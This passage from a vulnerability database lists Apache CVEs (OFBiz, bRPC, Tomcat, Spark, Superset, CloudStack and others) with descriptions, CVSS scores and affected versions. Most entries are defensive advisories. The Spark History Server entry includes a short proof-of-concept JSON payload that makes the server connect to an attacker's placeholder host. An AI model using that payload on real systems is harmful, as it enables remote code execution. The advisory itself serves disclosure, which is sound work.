Improper Control of Generation of Code ('Code Injection') vulnerability leading to a possible RCE in Apache OFBiz scrum plugin. This issue affects Apache OFBiz: before 24.09.02 only when the scrum plugin is used. Even unauthenticated attackers can exploit this vulnerability. Users are recommended to upgrade to version 24.09.02, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 2.8 3.4
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-54472

Unlimited memory allocation in the redis protocol parser in Apache bRPC (all versions < 1.14.1) on all platforms allows attackers to crash the service via the network. Root Cause: In the bRPC Redis protocol parser code, memory for arrays or strings of the corresponding sizes is allocated based on integers read from the network. If the integer read from the network is too large, it may cause a bad alloc error and lead to the program crashing. Attackers can exploit this behaviour by sending special data packets to the bRPC service to carry out a denial-of-service attack on it. bRPC version 1.14.0 tried to fix this issue by limiting the memory allocation size; however, the limit-checking code is not well implemented and may suffer an integer overflow that evades the limit. So version 1.14.0 is also vulnerable, although the integer range that affects version 1.14.0 is different from that affecting versions < 1.14.0. Affected scenarios: Using bRPC as a Redis server to provide network services to untrusted clients, or using bRPC as a Redis client to call untrusted Redis services. How to Fix: we provide two methods; you can choose either of them: 1. Upgrade bRPC to version 1.14.1. 2. Apply this patch ( https://github.com/apache/brpc/pull/3050 ) manually. Whichever method you choose, note that the patch limits the maximum length of memory allocated at a time in the bRPC Redis parser. The default limit is 64M. If some of your redis requests or responses have a size larger than 64M, you might encounter errors after upgrading. For such cases, you can modify the gflag redis_max_allocation_size to set a larger limit.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache brpc *
CVE-2025-54539

A Deserialization of Untrusted Data vulnerability exists in the Apache ActiveMQ NMS AMQP Client. This issue affects all versions of Apache ActiveMQ NMS AMQP up to and including 2.3.0, when establishing connections to untrusted AMQP servers. Malicious servers could exploit unbounded deserialization logic present in the client to craft responses that may lead to arbitrary code execution on the client side. Although version 2.1.0 introduced a mechanism to restrict deserialization via allow/deny lists, the protection was found to be bypassable under certain conditions. In line with Microsoft’s deprecation of binary serialization in .NET 9, the project is evaluating the removal of .NET binary serialization support from the NMS API entirely in future releases. Mitigation and Recommendations: Users are strongly encouraged to upgrade to version 2.4.0 or later, which resolves the issue. Additionally, projects depending on NMS-AMQP should migrate away from .NET binary serialization as part of a long-term hardening strategy.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache activemq_nms_amqp *
CVE-2025-54656

** UNSUPPORTED WHEN ASSIGNED ** Improper Output Neutralization for Logs vulnerability in Apache Struts. This issue affects Apache Struts Extras: before 2. When using LookupDispatchAction, in some cases, Struts may print untrusted input to the logs without any filtering. Specially crafted input may lead to log output where part of the message masquerades as a separate log line, confusing consumers of the logs (either human or automated). As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache struts_extras *
CVE-2025-54812

Improper Output Neutralization for Logs vulnerability in Apache Log4cxx. When using HTMLLayout, logger names are not properly escaped when writing out to the HTML file. If untrusted data is used to retrieve the name of a logger, an attacker could theoretically inject HTML or JavaScript in order to hide information from logs or steal data from the user. In order to activate this, the following sequence must occur: * Log4cxx is configured to use HTMLLayout. * The logger name comes from an untrusted string. * The logger with the compromised name logs a message. * A user opens the generated HTML log file in their browser, leading to potential XSS. Because logger names are generally constant strings, we assess the impact to users as LOW. This issue affects Apache Log4cxx: before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache log4cxx *
CVE-2025-54813

Improper Output Neutralization for Logs vulnerability in Apache Log4cxx. When using JSONLayout, not all payload bytes are properly escaped. If an attacker-supplied message contains certain non-printable characters, these will be passed along in the message and written out as part of the JSON message. This may prevent applications that consume these logs from correctly interpreting the information within them. This issue affects Apache Log4cxx: before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4cxx *
CVE-2025-54831

Apache Airflow 3 introduced a change to the handling of sensitive information in Connections. The intent was to restrict access to sensitive connection fields to Connection Editing Users, effectively applying a "write-only" model for sensitive values. In Airflow 3.0.3, this model was unintentionally violated: sensitive connection information could be viewed by users with READ permissions through both the API and the UI. This behavior also bypassed the `AIRFLOW__CORE__HIDE_SENSITIVE_VAR_CONN_FIELDS` configuration option. This issue does not affect Airflow 2.x, where exposing sensitive information to connection editors was the intended and documented behavior. Users of Airflow 3.0.3 are advised to upgrade Airflow to >=3.0.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow 3.0.3
CVE-2025-54920

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fix the issue. Summary: Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details: The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker's server, confirming the injection.
Impact: An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache spark 4.0.1
apache spark 4.0.0
apache spark *
CVE-2025-54941

An example dag `example_dag_decorator` had a non-validated parameter that allowed a UI user to redirect the example to a malicious server and execute code on a worker. This however required that the example dags were enabled in production (not the default) or that the example dag code was copied to build your own similar dag. If you used the `example_dag_decorator`, please review it and apply the changes implemented in Airflow 3.0.5 accordingly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-54947

In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-54981

Weak Encryption Algorithm in StreamPark. The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-54988

Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. Note that the tika-parser-pdf-module is used as a dependency in several Tika packages including at least: tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc and tika-server-standard. Users are recommended to upgrade to version 3.2.2, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 2.5 5.9
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tika *
CVE-2025-55039

This issue affects Apache Spark versions before 3.4.4, 3.5.2 and 4.0.0. Apache Spark versions before 4.0.0, 3.5.2 and 3.4.4 use an insecure default network encryption cipher for RPC communication between nodes. When spark.network.crypto.enabled is set to true (it is set to false by default), but spark.network.crypto.cipher is not explicitly configured, Spark defaults to AES in CTR mode (AES/CTR/NoPadding), which provides encryption without authentication. This vulnerability allows a man-in-the-middle attacker to modify encrypted RPC traffic undetected by flipping bits in ciphertext, potentially compromising heartbeat messages or application data and affecting the integrity of Spark workflows. To mitigate this issue, users should either configure spark.network.crypto.cipher to AES/GCM/NoPadding to enable authenticated encryption or enable SSL encryption by setting spark.ssl.enabled to true, which provides stronger transport security.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache spark *
CVE-2025-55668

Session Fixation vulnerability in Apache Tomcat via rewrite valve. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2025-55672

A stored Cross-Site Scripting (XSS) vulnerability exists in Apache Superset's chart visualization. An authenticated user with permissions to edit charts can inject a malicious payload into a column's label. The payload is not properly sanitized and gets executed in the victim's browser when they hover over the chart, potentially leading to session hijacking or the execution of arbitrary commands on behalf of the user. This issue affects Apache Superset: before 5.0.0. Users are recommended to upgrade to version 5.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55673

When a guest user accesses a chart in Apache Superset, the API response from the /chart/data endpoint includes a query field in its payload. This field contains the underlying query, which improperly discloses database schema information, such as table names, to the low-privileged guest user. This issue affects Apache Superset: before 4.1.3. Users are recommended to upgrade to version 4.1.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55674

A bypass of the DISALLOWED_SQL_FUNCTIONS security feature in Apache Superset allows for the execution of blocked SQL functions. An attacker can use a special inline block to circumvent the denylist. This allows a user with SQL Lab access to execute functions that were intended to be disabled, leading to the disclosure of sensitive database information like the software version. This issue affects Apache Superset: before 5.0.0. Users are recommended to upgrade to version 5.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55675

Apache Superset contains an improper access control vulnerability in its /explore endpoint. A missing authorization check allows an authenticated user to discover metadata about datasources they do not have permission to access. By iterating through the datasource_id in the URL, an attacker can enumerate and confirm the existence and names of protected datasources, leading to sensitive information disclosure. This issue affects Apache Superset: before 5.0.0. Users are recommended to upgrade to version 5.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55752

Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2025-55753

An integer overflow in the case of failed ACME certificate renewal leads, after a number of failures (~30 days in default configurations), to the backoff timer becoming 0. Attempts to renew the certificate then are repeated without delays until it succeeds. This issue affects Apache HTTP Server: from 2.4.30 before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-55754

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker-controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.60 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-57738

Apache Syncope offers the ability to extend / customize the base behavior on every deployment by allowing custom implementations of a few Java interfaces to be provided; such implementations can be provided either as Java or Groovy classes, with the latter being particularly attractive as the machinery is set up for runtime reload. Such a feature has been available for a while, but recently it was discovered that a malicious administrator can inject Groovy code that can be executed remotely by a running Apache Syncope Core instance. Users are recommended to upgrade to version 3.0.14 / 4.0.2, which fix this issue by forcing the Groovy code to run in a sandbox.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

Products Affected

Vendor Product Version
apache syncope *
CVE-2025-58098

Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives. This issue affects Apache HTTP Server before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L 2.8 5.5

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-58130

Insufficiently Protected Credentials vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache fineract *
CVE-2025-58137

Authorization Bypass Through User-Controlled Key vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache fineract *
CVE-2025-58337

An attacker with a valid read-only account can bypass Doris MCP Server’s read-only mode due to improper access control, allowing modifications that should have been prevented by read-only restrictions. Impact: Bypasses read-only mode; attackers with read-only access may perform unauthorized modifications. Recommended action for operators: Upgrade to version 0.6.0 as soon as possible (this release contains the fix).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache doris_mcp_server *
CVE-2025-58457

Improper permission check in ZooKeeper AdminServer lets authorized clients run the snapshot and restore commands with insufficient permissions. This issue affects Apache ZooKeeper: from 3.9.0 before 3.9.4. Users are recommended to upgrade to version 3.9.4, which fixes the issue. The issue can be mitigated by disabling both commands (via admin.snapshot.enabled and admin.restore.enabled), disabling the whole AdminServer interface (via admin.enableServer), or ensuring that the root ACL does not provide open permissions. (Note that ZooKeeper ACLs are not recursive, so this does not impact operations on child nodes besides notifications from recursive watches.)

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2025-58782

Deserialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons. This issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1. Deployments that accept JNDI URIs for JCR lookup from untrusted users allow them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are advised to review their use of JNDI URIs for JCR lookup.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache jackrabbit *
apache jackrabbit_jcr_commons *
CVE-2025-59118

Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.03. Users are recommended to upgrade to version 24.09.03, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-59302

In Apache CloudStack, an improper control of generation of code ('Code Injection') vulnerability is found in the following APIs, which are accessible only to admins:
* quotaTariffCreate
* quotaTariffUpdate
* createSecondaryStorageSelector
* updateSecondaryStorageSelector
* updateHost
* updateStorage
This issue affects Apache CloudStack: from 4.18.0 before 4.20.2, from 4.21.0 before 4.22.0. Users are recommended to upgrade to versions 4.20.2 or 4.22.0, which contain the fix. The fix introduces a new global configuration flag, js.interpretation.enabled, allowing administrators to control the interpretation of JavaScript expressions in these APIs, thereby mitigating the code injection risk.

Products Affected

Vendor Product Version
apache cloudstack 4.21.0.0
apache cloudstack *
CVE-2025-59328

A vulnerability in Apache Fory allows a remote attacker to cause a Denial of Service (DoS). The issue stems from the insecure deserialization of untrusted data. An attacker can supply a large, specially crafted data payload that, when processed, consumes an excessive amount of CPU resources during the deserialization process. This leads to CPU exhaustion, rendering the application or system using the Apache Fory library unresponsive and unavailable to legitimate users. Users of Apache Fory are strongly advised to upgrade to version 0.12.2 or later to mitigate this vulnerability. Developers of libraries and applications that depend on Apache Fory should update their dependency requirements to Apache Fory 0.12.2 or later and release new versions of their software.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache fory *
CVE-2025-59355

A vulnerability. When org.apache.linkis.metadata.util.HiveUtils.decode() fails to perform Base64 decoding, it records the complete input parameter string in the log via logger.error(str + "decode failed", e). If the input parameter contains sensitive information such as Hive Metastore keys, plaintext passwords will be left in the log files when decoding fails, resulting in information leakage.

Affected Scope
Component: Sensitive fields in hive-site.xml (e.g., javax.jdo.option.ConnectionPassword) or other fields encoded in Base64.
Version: Apache Linkis 1.0.0 – 1.7.0

Trigger Conditions
The value of the configuration item is an invalid Base64 string.
Log files are readable by users other than hive-site.xml administrators.

Severity: Low
The probability of Base64 decoding failure is low. The leakage is only triggered when logs at the Error level are exposed.

Remediation
Apache Linkis 1.8.0 and later versions have replaced the log with desensitized content: logger.error("URL decode failed: {}", e.getMessage()); // str is no longer output
Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2025-59390

Apache Druid’s Kerberos authenticator uses a weak fallback secret when the `druid.auth.authenticator.kerberos.cookieSignatureSecret` configuration is not explicitly set. In this case, the secret is generated using `ThreadLocalRandom`, which is not a cryptographically secure random number generator. This may allow an attacker to predict or brute force the secret used to sign authentication cookies, potentially enabling token forgery or authentication bypass. Additionally, each process generates its own fallback secret, resulting in inconsistent secrets across nodes. This causes authentication failures in distributed or multi-broker deployments, effectively leading to incorrectly configured clusters. Users are advised to configure a strong `druid.auth.authenticator.kerberos.cookieSignatureSecret`. This issue affects Apache Druid: through 34.0.0. Users are recommended to upgrade to version 35.0.0, which fixes the issue by making it mandatory to set `druid.auth.authenticator.kerberos.cookieSignatureSecret` when using the Kerberos authenticator. Services will fail to come up if the secret is not set.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache druid *
CVE-2025-59454

In Apache CloudStack, a gap in access control checks affected the APIs:
- createNetworkACL
- listNetworkACLs
- listResourceDetails
- listVirtualMachinesUsageHistory
- listVolumesUsageHistory
While these APIs were accessible only to authorized users, insufficient permission validation meant that users could occasionally access information beyond their intended scope. Users are recommended to upgrade to Apache CloudStack 4.20.2.0 or 4.22.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache cloudstack 4.21.0.0
apache cloudstack *
CVE-2025-59775

Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows with AllowEncodedSlashes On and MergeSlashes Off allows NTLM hashes to potentially be leaked to a malicious server via SSRF and malicious requests or content. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-59789

Uncontrolled recursion in the json2pb component in Apache bRPC (version < 1.15.0) on all platforms allows remote attackers to make the server crash by sending deeply recursive JSON data.
Root Cause: The bRPC json2pb component uses rapidjson to parse JSON data from the network. The rapidjson parser uses a recursive parsing method by default. If the input JSON has a deeply nested recursive structure, the parser function may run into a stack overflow.
Affected Scenarios: Using a bRPC server with protobuf messages to serve http+json requests from an untrusted network, or directly using JsonToProtoMessage to convert JSON from untrusted input.
How to Fix: (Choose one of the following options) 1. Upgrade bRPC to version 1.15.0, which fixes this issue. 2. Apply this patch: https://github.com/apache/brpc/pull/3099
Note: No matter which option you choose, you should know that the fix introduces a recursion depth limit with a default value of 100. It affects these functions: ProtoMessageToJson, ProtoMessageToProtoJson, JsonToProtoMessage, and ProtoJsonToProtoMessage. If your requests contain JSON or protobuf messages whose depth exceeds the limit, the request will fail after applying the fix. You can modify the gflag json2pb_max_recursion_depth to change the limit.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache brpc *
CVE-2025-59790

Improper Privilege Management vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from v2.9.0 through v2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-59792

A vulnerability in Apache Kvrocks reveals plaintext credentials in the MONITOR command. This issue affects Apache Kvrocks: from 1.0.0 through 2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-60012

Malicious configuration can lead to unauthorized file access in Apache Livy. This issue affects Apache Livy 0.7.0 and 0.8.0 when connecting to Apache Spark 3.1 or later. A request that includes a Spark configuration value supported from Apache Spark version 3.1 can lead to users gaining access to files they do not have permissions to. For the vulnerability to be exploitable, the user needs to have access to Apache Livy's REST or JDBC interface and be able to send requests with arbitrary Spark configuration values. Users are recommended to upgrade to version 0.9.0 or later, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache livy *
CVE-2025-61581

